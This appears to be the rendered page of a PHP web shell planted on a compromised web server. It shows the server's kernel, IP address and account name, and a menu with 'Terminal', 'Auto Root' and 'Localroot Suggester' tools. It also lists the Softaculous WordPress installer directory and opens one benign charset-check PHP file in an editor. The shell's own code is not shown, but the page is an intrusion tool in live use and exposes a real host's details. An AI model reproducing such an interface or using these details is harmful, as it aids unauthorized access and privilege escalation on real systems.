Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
LiteSpeed
Server IP : 46.4.120.162 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : seatingsolutions
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
languages
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
php53
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
php56
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
php71
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
php81
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
php82
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
plugins
[ DIR ]
drwxr-xr-x
2026-04-16 08:48
.htaccess
482
B
-rw-r--r--
2021-12-16 03:02
_htaccess
553
B
-rw-r--r--
2021-12-16 03:02
_index.php
59
B
-rw-r--r--
2021-12-16 03:02
_wp-config.php
3.37
KB
-rw-r--r--
2025-04-16 00:47
add_user.php
461
B
-rw-r--r--
2021-12-16 03:02
backup.php
3.01
KB
-rw-r--r--
2026-03-12 08:04
check_charset.php
2.02
KB
-rw-r--r--
2021-12-16 03:02
clone.php
32.21
KB
-rw-r--r--
2026-03-12 08:04
clone.xml
497
B
-rw-r--r--
2021-12-16 03:02
edit.php
10.36
KB
-rw-r--r--
2026-03-12 08:04
edit.xml
2.2
KB
-rw-r--r--
2026-02-18 04:17
extend.php
102.04
KB
-rw-r--r--
2026-03-12 08:04
fileindex.php
291
B
-rw-r--r--
2021-12-16 03:02
import.php
6.53
KB
-rw-r--r--
2026-03-12 08:04
info.xml
16.4
KB
-rw-r--r--
2026-03-12 01:46
install.js
4.2
KB
-rw-r--r--
2025-06-30 05:57
install.php
32
KB
-rw-r--r--
2026-03-12 08:04
install.xml
11.13
KB
-rw-r--r--
2026-02-18 04:17
md5
4.51
KB
-rw-r--r--
2026-03-12 08:04
multisite.sql
37.99
KB
-rw-r--r--
2026-03-12 01:46
notes.txt
6.39
KB
-rw-r--r--
2026-03-11 05:32
plugin_activate.php
596
B
-rw-r--r--
2021-12-16 03:02
plugin_deactivate.php
613
B
-rw-r--r--
2021-12-16 03:02
post_download.json
72
B
-rw-r--r--
2022-05-25 05:00
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 03:04
soft.htaccess
127
B
-rw-r--r--
2021-12-16 03:02
update_pass.php
639
B
-rw-r--r--
2025-12-04 02:15
upgrade.php
15.18
KB
-rw-r--r--
2026-03-12 08:04
upgrade.xml
2.05
KB
-rw-r--r--
2026-02-18 04:17
wp-cli
6.19
MB
-rwxr-xr-x
2022-07-14 23:49
wp-config.php
3.08
KB
-rw-r--r--
2024-11-13 03:30
wp.sql
30.38
KB
-rw-r--r--
2026-03-12 01:46
wp.zip
27.06
MB
-rw-r--r--
2026-03-12 01:46
Save
Rename
<?php function __has_cap(){ global $use_mysqli; $use_mysqli = false; if ( function_exists( 'mysqli_connect' ) ) { if ( version_compare( phpversion(), '5.5', '>=' ) || ! function_exists( 'mysql_connect' ) ) { $use_mysqli = true; } elseif ( false !== strpos( '[[wpver]]', '-' ) ) { $use_mysqli = true; } } $version = __db_version(); if ( version_compare( $version, '5.5.3', '<' ) ) { return false; } if ( $use_mysqli ) { $client_version = mysqli_get_client_info(); } else { $client_version = mysql_get_client_info(); } /* * libmysql has supported utf8mb4 since 5.5.3, same as the MySQL server. * mysqlnd has supported utf8mb4 since 5.0.9. */ if ( false !== strpos( $client_version, 'mysqlnd' ) ) { $client_version = preg_replace( '/^\D+([\d.]+).*/', '$1', $client_version ); return version_compare( $client_version, '5.0.9', '>=' ); } else { return version_compare( $client_version, '5.5.3', '>=' ); } return false; } function __db_version() { global $use_mysqli; if ( $use_mysqli ) { $server_info = mysqli_get_server_info( mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } else { $server_info = mysql_get_server_info( mysql_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } return preg_replace( '/[^0-9.].*/', '', $server_info ); } $has_cap = __has_cap(); // To determine which colllation to use. Added from WP 5.4.2 $dbversion = __db_version(); if ( version_compare( $dbversion, '5.6', '>=' ) ) { $utf8mb4 = 'utf8mb4_520'; }else{ $utf8mb4 = 'utf8mb4'; } if(!empty($has_cap)){ echo '<claim_utf8>'.$utf8mb4.'</claim_utf8>'; } // Server detection /** * Whether the server software is Apache or something else * @global bool $soft_is_apache */ $soft_is_apache = (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false); if(!empty($soft_is_apache)){ echo '<soft_apache>soft_is_apache</soft_apache>'; }else{ echo '<soft_apache>soft_not_apache</soft_apache>'; } ?>